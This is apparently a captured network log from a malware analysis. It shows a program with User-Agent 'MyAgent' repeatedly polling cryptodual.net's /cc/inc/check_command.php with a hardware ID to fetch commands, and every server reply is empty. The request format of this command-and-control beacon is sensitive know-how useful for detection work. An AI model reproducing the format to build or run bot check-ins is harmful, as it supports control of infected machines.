Jan 4, 2021 19:16:59.443300962 CET	1332	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:16:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 077036ef080000d6d9f99bf000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=V3%2FZ5V%2FglIYem3%2BG00zX2IhOz6m%2BFjMXOUf9M5WxNpQ092FlEcqhCFS7wMeBm%2BNuLSvONokfNl6kM1vnUrmtaIn3jo0juI3LGF%2FtUJL%2BfQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f42b4d40d6d9-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:17:04.455586910 CET	1333	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:17:04.549865007 CET	1334	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:17:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 07703702ed0000d6d91c037000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=uYUJYHb9ppwWqKbonAv8NTdGrADrOfZn2rG%2Btvp5MEWwC1HVrjaOoWVgSDiAsFxcM2ceNZAR24qejWWWD2EADDzoFow0PXHrygsPRd1U2g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f44b1a87d6d9-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:17:04.552220106 CET	1334	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:17:04.636149883 CET	1336	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:17:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 077037034e0000d6d96e9fd000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=0PuRxTvytwGAOZmZp26xeyes5ObKFhHiRD9xPN1GSskyJFDoGyz4NSOFOuMdT6oqApw58YzrcsRy9Gc%2B4fZsA7S0ax%2FawWfmHmEI6B5WrQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f44babc1d6d9-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:17:04.643834114 CET	1336	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:17:04.722493887 CET	1338	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:17:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 07703703ac0000d6d93b1de000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=ZpU3tJUedUYgW2oSiEBjnSX7fDq3rm531S0oczJcGLIsQNs5Xa0%2F4A6xDAvx38R3NeFJtMVs1I3ugWTZMHnag%2BMNN5NVDdJ4YHS5iHsPGA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f44c4d0ad6d9-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:17:04.724303007 CET	1338	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:17:04.798818111 CET	1340	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:17:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 07703703f90000d6d916a14000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=42yZNj5sPF8895oINslwAJkULzyf9x98wj8tjr1%2F57nFyFOjat42Vr307ODS1c8uBbBlbRQfefX4bwcd9bumMVYwIc4b2tpzFsZx1Te1CA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f44cce3dd6d9-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:17:09.805414915 CET	1342	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:17:09.889626026 CET	1343	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:17:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 07703717d20000d6d97187f000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=My9OSjAjsCIjXTve3%2B06lo2%2FfbAqae5JFV%2FrbILIaxbxNt81IIfcaqvA3ekTbX5Ks%2BAfQG6Wy%2FJEdbhBbsbW9daCx0orbUpfbgkIytA%2FBQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f46c8c22d6d9-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:17:09.893394947 CET	1343	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:17:09.980516911 CET	1344	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:17:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 077037182b0000d6d96b827000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=shCMkfbY0SqFq2QZao6nOYJFqfAE4epr%2FqkZ1z8P%2Fn0GS3t6eGuD3Wn3HwPqyE%2Byy0a8XboQGHoSNyF0ko6um5MknPAz4zLg8JyefAkQgw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f46d1d2dd6d9-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:17:09.984304905 CET	1344	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:17:10.066766024 CET	1346	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:17:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive x-powered-by: PHP/7.0.33 x-turbo-charged-by: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 07703718850000d6d941053000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=0MpkGyOAnnP3nUss1pAwFACKGqdX%2FSk%2BfXiwcFAQTHVvIWu0yA9rXw6%2F%2BaVbk50VINzh%2BaA%2BLGlqQSLjLX5XsDnYWltkzIM%2F%2F0G20Cd65A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f46dae7dd6d9-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:17:10.070358992 CET	1346	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:17:10.152201891 CET	1348	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:17:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 07703718dc0000d6d95831c000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=OZvxNCyypu6s%2FfUI4OEpvojTJXVsX2ld1fkwrYq5UOZdT57YIpUEF2xtZ3NsV%2FEYvR%2Bzi1N1TcU6XJKMV0ouyr1kOiuci%2FhH9RWmBD1RKQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f46e2839d6d9-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:17:15.166876078 CET	1350	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:17:15.256918907 CET	1351	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:17:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 0770372cc40000d6d91c001000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=9vFbtvCMiJbAzniEqmGTEgobCes8fapsDhHiJDfwM8LmL7yfOxyYCxJ45L50LLC%2FXvde3y6Pnx70W2LI6t2qXB6sd41rigzGiq6zyNkVXg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f48e0c3bd6d9-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:17:15.258449078 CET	1351	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:17:15.338135004 CET	1353	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:17:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 0770372d1f0000d6d94e9e4000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=oVRPSpr19so6TgvflduQAb%2Bmv7%2FbCInxopio6p%2FtmlOwtU9riY%2FOZAmb7154c9Ex0haFeQ7fPrv%2FNFrhUzZec8IpDOI%2BYBF6xwmZFPJ4lQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f48e9d68d6d9-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:17:15.339893103 CET	1353	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:17:15.422821045 CET	1355	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:17:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 0770372d730000d6d949ab6000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=su0v1GD2h6oZYXlq2AT4iwQfYAoEkwjH7kJ3D9oPdefp%2BEnkf9Esnxloo2vShvKRxdiC926ieX6bQDlsFHpOI%2Fe7WbQCf61WfeScqKZOJg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f48f1ea2d6d9-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:17:15.425206900 CET	1355	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:17:15.504051924 CET	1358	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:17:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 0770372dc60000d6d90dacf000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=aBPdcnJ%2F1Zu3WCALo4f00WmCdQOXl5YCd59rd%2BwGfZ55uYpKPoqvvI0b%2BHt909uLQfltCJgB05XXrCvXvHkpCmcNndfYcFLryToEQE5Hfw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f48fafa8d6d9-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:17:20.524226904 CET	1358	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:17:20.604468107 CET	1360	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:17:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 07703741b40000d6d946870000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=xW41p99c9M4qWqngSEt2LH7ZVUKmsAqL%2BIU8CQ%2FwV128xYzevHd658xqYsc0jDMYGOseUBWqOtEfm%2FDd2KqvKJNJGzvdGA5W5dJeULrRGQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f4af8cffd6d9-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:17:20.608154058 CET	1360	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:17:20.684782028 CET	1362	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:17:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 07703742060000d6d9fb962000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=yeMI0l9RAZkBxH0yH99S0oL%2B8%2BHiEmNc2ZVR6z5NY3y5AO6Zf3uSFq1ZNKU2d5OhK1cj6DMVRtUKcnQuHQ44Dv17yN9049Nt5IQDTDXBrw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f4b00e49d6d9-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:17:20.688240051 CET	1363	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:17:20.778718948 CET	1364	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:17:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive x-powered-by: PHP/7.0.33 x-turbo-charged-by: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 07703742550000d6d940b0c000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=s%2FuBmSLjUtk4DKsqE%2FljhoGUM1VwCETGpFVbRgexaObwoo76kAgYVv2uK%2B%2FkH63EkYQ4KE02GWsCP7zqcukSW7W%2F6GsravJbT1Irh%2FHEsA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f4b08fa9d6d9-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:17:20.781972885 CET	1365	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:17:20.867063999 CET	1366	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:17:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 07703742b30000d6d9f98f8000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=RqcNQOjH%2FKAEp9pICAeI4AB%2FTbXQar2ea1pNFiN7SDEGNaDT0J3cbmMz%2F4F%2Fls3EeOpKRqHFVxRc9uzTsXGq4d2PltccVKiDVT%2FuUYV%2B0g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f4b118e2d6d9-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:17:25.871639013 CET	1368	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:17:25.957973957 CET	1369	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:17:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 07703756950000d6d93d2a0000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=WlvSQGj3NPiMVZ5SQl3OmQiCETjjVbQ%2FaABM0OM4f2tnohMYRtu6B%2BIiyYCq1Yd8dWqS6ufTk1JERrdVnbF1xgIPv7NTPqLvUypt2vwF%2Fw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f4d0ef10d6d9-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:17:25.960122108 CET	1370	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:17:26.038851976 CET	1371	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:17:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 07703756ee0000d6d961b7f000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=ZPK2OPkfvFgBijwj8cem%2F7lm9ugygk7s1uHaV%2BQBZFL9u%2Fa9lQlNUcQ6mcxyWSTuc8QdjONrgDtqLGwoBYWBJ2M3TbgqxcZTohQjAizBaA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f4d1783fd6d9-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:17:26.040878057 CET	1372	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:17:26.129098892 CET	1373	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:17:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive x-powered-by: PHP/7.0.33 x-turbo-charged-by: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 077037573e0000d6d95804b000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=2QnINgmcWz7dlsDKRZwAZwR2%2B7JTZtiGfRG1VMyhVITgX2rBGnJeVD2ldAC6527JPnIDaDAWKjGP25bHurZmfiXQbzbuziKcQSxhrlBfug%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f4d1f9a9d6d9-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:17:26.131248951 CET	1374	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:17:26.303484917 CET	1374	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:17:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 077037579a0000d6d9179bd000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=u8G2%2Bk7ijOqv1V8TEF0fxa%2Fi%2BdWHrIcuPRvFuHgKVG6RRqdtnOE0vxifnYhRQWvoekdAOo4UnwQt9wtoJxYOrfT1Rc4AolpIUTT4LDi3pg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f4d28b00d6d9-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:17:31.638736963 CET	1377	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:17:31.730308056 CET	1379	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:17:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 0770376d1c0000d6d942848000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=iUnfvLxS1EcRLArSisN2qO1W%2FUg%2F02fDT9vPCEWgWNv9%2FLOHD6mlATFzHMmdXeKa%2Fan0RIvPs3q7ypUhRFxZI5tq%2FBeCTwSJsCGO%2BJJkQw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f4f4ff00d6d9-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:17:31.733062029 CET	1379	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:17:31.818725109 CET	1380	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:17:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 0770376d7d0000d6d96eb21000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=GVMGdnowVG04%2Bp8x5I94G5x89%2FT3MCnaF%2FpMDR2qPrAIi2bfUZ7ETSX9IqU7Qu6u1%2Bf3TdAU6oMgNPiegADmXuA1Ihi6ybRIfWYnTpJziw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f4f5981ad6d9-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:17:31.821297884 CET	1381	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:17:31.896210909 CET	1381	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:17:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 0770376dd30000d6d96f313000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=Ic4w%2BDC3UpNQ9H6A7BfdfS46Bqq7sEJXSeZuXoqpPcSRwf3%2B7pjnYChQNVx%2BHZcWg1QLuFPoSP4qIv04sv26G7RKTNebdEgKIkrCVs7opw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f4f61919d6d9-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:17:31.899070024 CET	1382	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:17:31.976599932 CET	1382	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:17:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 0770376e200000d6d941356000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=SdKWYcL2HyvAsaMM3%2FKHBalSEHk2dbt0afk0z6JDD5fRlXTDhl7qmovHWQjEA66hGkUJTeaDDbkFMJsGnUK6SO8YMOsWV7fvItaTfoFV%2BA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f4f69a12d6d9-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
